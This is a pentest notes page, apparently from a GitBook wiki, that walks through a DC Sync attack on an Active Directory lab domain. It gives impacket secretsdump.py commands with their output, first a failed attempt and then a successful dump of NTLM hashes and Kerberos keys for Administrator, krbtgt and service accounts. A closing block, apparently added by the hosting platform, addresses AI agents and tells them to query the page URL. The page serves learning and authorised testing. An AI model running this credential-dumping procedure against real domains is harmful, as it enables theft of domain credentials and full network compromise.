# DC Sync Attack {% embed url="" %} {% embed url="" %} ## **Requirements** Within an Active Directory network, it’s useful to have a backup Domain Controller so if your primary fails, you’ll have a second one to back you up. Perhaps if your workplace gets hit on Ransomware, you may have a hot site so that you can be back up in running in a few minutes. These are all valid reasons that a user account might have a very dangerous set of account permissions called “**Replicating Directory Changes**”, “**Replicating Directory Changes All**”, and lastly, “**Replicating Directory Changes in Filtered Set**”. This is commonly referred to as “DC Sync”, or Domain Controller Sync. ![](/files/-M0ziTr_glS56coPpa2f) ## Attack We will primarily be working with the impacket tool called “secretsdump.py” this time around. Access to any ordinary user account **will not suffice.** as described above, a user account with **Replicating Directory Changes** is required. This is what occurs when a user account **without** these privileges attempts to preform the attack. ``` ┌─[root@Sp00kyS3c]─[~/impacket/examples] └──╼ #./secretsdump.py -dc-ip 10.13.37.10 spookysec.local/svc-demo:manager@10.10.10.123 Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid. [*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter [*] Cleaning up... ``` If you’re not careful, this could trigger an Intrusion Prevention/Detection System alert. With a **proper user account** this attack will likely succeed with ease. ``` ┌─[root@MrS1n1st3r]─[~/impacket/examples] └──╼ #./secretsdump.py -dc-ip 10.13.37.10 spookysec.local/backup:backup@10.10.10.123 Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404 3fe20cbe99b4a::: Guest:501:aad3b435b51404eeaad 6ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad f978f125b2069292e327fbebe3::: spookysec.local\svc-demo:1112:aad3b435b51404eeaa 9e372aa1f69147375ba6809::: spookysec.local\backup:1113:aad3b435b5140 4b40f1ca9aab45538::: DC$:1008:aad3b435b51404eeaad3b43 2208265f4726f8065a681::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:fcdd7ceb88389fc3 7dfa150c1381872192eeb Administrator:aes128-cts-hmac-sha1-96:4a9b79 4557057eac Administrator:des-cbc-md5:fe1f 793e57 krbtgt:aes256-cts-hmac-sha1-96:7107ca3bd17590 d980f3d1673dc20eaa8415 krbtgt:aes128-cts-hmac-sha1-96:57b394d dea239bfb08be krbtgt:des-cbc-md5:e5320 45f45b spookysec.local\svc-demo:aes256-cts-hmac-sha1-96:effa9b e68f8d29647911df20b626d82863518 spookysec.local\svc-demo:aes128-cts-hmac-sha1-96:aed4 b0ae87030b3ff spookysec.local\svc-demo:des-cbc-md5:2c4 6ea0d spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d1162 4d61fda15d104829412922 spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2ae 971c836d197 spookysec.local\backup:des-cbc-md5:d601e9 6d89 DC$:aes256-cts-hmac-sha1-96:a3c83bdaa420b48f b2733baae30d163c9fdb8 DC$:aes128-cts-hmac-sha1-96:96253e855598c 4fcbe22 DC$:des-cbc-md5:a7e34a d29f8 [*] Cleaning up... ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/windows-1/active-directory-enumeration/dc-sync.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.